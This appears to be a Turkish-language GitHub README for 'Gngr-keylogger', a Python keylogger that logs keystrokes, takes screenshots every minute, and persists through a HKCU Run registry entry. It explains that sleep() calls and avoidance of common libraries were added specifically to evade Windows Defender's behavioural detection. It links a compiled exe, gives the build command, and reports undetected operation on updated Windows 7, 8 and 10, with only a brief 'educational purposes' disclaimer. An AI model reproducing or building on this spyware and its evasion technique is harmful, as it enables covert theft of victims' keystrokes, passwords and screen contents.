(On 06/04/2021) Local Keylogger software has been made for the latest up-to-date "Windows 7, 8 and 10" operatings systems. It managed to circumvent the "Windows Defender" program.
Windows 10 işletim sisteminde çalışan ve Defender gibi güvenlik programlarına yakalanmayan "Local keylogger" programı yazılması hedeflenmiştir. 06/04/2021 tarihi itibarıyla gerçekleştirilmiştir. Güncellemelerle beraber zamanla bu durum değişebilir.
Kaynak kodun derlenmiş hali (-Exe hali-) https://drive.google.com/file/d/1tvtZcLb_Sm-gQI8cXSjLKKNoXZlFxd2e/view?usp=sharing adresinde indirilebilir. İndirilen rar dosyasının şifresi "gngr-v1.0" dir.
Kaynak kodun derlenmiş çalışır hali ile ilgili video https://www.youtube.com/watch?v=Zb03F4iYUzg adresinden izlenebilir.
Gerekli kütüphaneler: PyWin32, pynput, pyautogui, pyinstaller
Yüklemek için;
pip install PyWin32
pip install pyautogui
pip install pyinstaller
"pyinstaller" kodu tek parça çalıştırılabilir dosya haline getirmek için kullanılacak
Keylogger kodlanırken "Python 3.8.5" kullanıldı. Program çalışırken; kendisini, log kayıtlarını ve ekran görüntülerini "%APPDATA%\Gngr-keylogger-v1.0" klasörü altında tutmaktadır. Ayrıca kalıcı olmak için regedit "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" altında "Gngr_keylogger" adı altında "%APPDATA%\Gngr-keylogger-v1.0\keylogger.exe" anahtarı eklemektedir.
Birbirine ihtiyac duymayan 3 farklı dosyadan oluşmaktadır. İşlemler sırasında seçiminize göre üçünden herhangi birini kullanabilirsiniz. Bütün özelliklere sahip olan "keylogger.py" kullanmanız tavsiye edilir.
keylogger.py ==> Hem ekran görüntüsünü 1 dk arayla kaydederken hem de klavyedeki basılan tuşları kaydeder.
keyboard_log.py ==> Sadece klavyedeki basılan tuşları kaydeder.
screen_log.py ==> Sadece ekran görüntüsünü kaydeder.
"pynput" gibi hazır kütüphane kullanılmamıştır. Tarafımdan klavye fonksiyonu yazılmıştır. Klavye fonksiyonu, "Türkçe Q Klavye"ye göre yazılmıştır. Eğer herhangi farklılık yaşamanız durumda ilgili klavye fonksiyonundan düzeltebilirsiniz. Detaylı bilgi için "https://docs.microsoft.com/tr-tr/dotnet/api/system.windows.forms.keys?view=net-5.0" adresine bakınız.
Kalıcılık için regedit girdisi kullanılmış olup, "wmic service" gibi daha agresif methodlar kullanılmamıştır. Farklı amaçlarla kullanılmaması için özellikle regedit kullanılmış olup, program "local keylogger" olacak şekilde dizayn edilmiştir.
Tespiti engellemek için "pynput" gibi çok kullanılan kütüphanelerden kaçınılmış olup, kaynak kodun içerisindeki "sleep()" kodları Defender'ı atlatmak için özellikle konulmuştur. Sonucu başarılı olmuştur. Bu sebepten "keylogger.py" kaynak kodu kullanılarak oluşturulan "exe" dosyalar, 4-5 dk sonra tam olarak çalışmaya başlar. Windows Defender sadece kaynak kodun imzasına bakmaz (sadece içerisinde zararlı kod aramaz), aynı zamanda davranışını da inceler. "sleep()" kodları, Windows Defender programında kullanılan zararlı davranış kalıplarının atlatılmasını sağlar.
pyinstaller --onefile --noconsole --icon=keyboard.ico keylogger.py
Aşağıda PyCharm programı üzerinde nasıl derlendiği resim olarak gösterilmektedir.
[1] Derleme işlemi
[2 - Kaynak Kodun Derlenmiş Hali] Oluşturulan dist klasörü içerisinde kaynak kodun derlenmiş hali bulunur.
İşlemler resim olarak, aşağıda sıralı şekilde gösterilmiştir.
[1]
[2]
[3]
[4]
[5]
[6]
[7]
[8]
Windows 7, 8 , 10 işletim sistemlerinde sorunsuz şekilde çalıştı. Özellikle tüm güncelleştirmeleri yapılmış işletim sistemleri seçildi. Ayrıca Defender ve Virüs tarama programı bulunan cihazlarda sorunsuz çalıştığı gözlemlendi.
[1]
[2]
[3]
[4]
Programın çalışması sırasında herhangi bir uyarı ile karşılaşılmadı. İlgili programın konumu gösterilerek, özellikle güncel Windows Defender ile taratılmıştır. "06/04/2021" tarihi itibarıyla Defender programı herhangi bir uyarı vermemiştir. Güncellemelerle beraber zamanla bu durum değişebilir.
Eğitim amacıyla hazırlanmıştır.
Kullanıcıların bazı kullanım şekilleri suça sebep olabilir.
Olumsuz durumlarla karşılaşmamak için "Yasal_Uyarı.txt" dosyasını okuyunuz.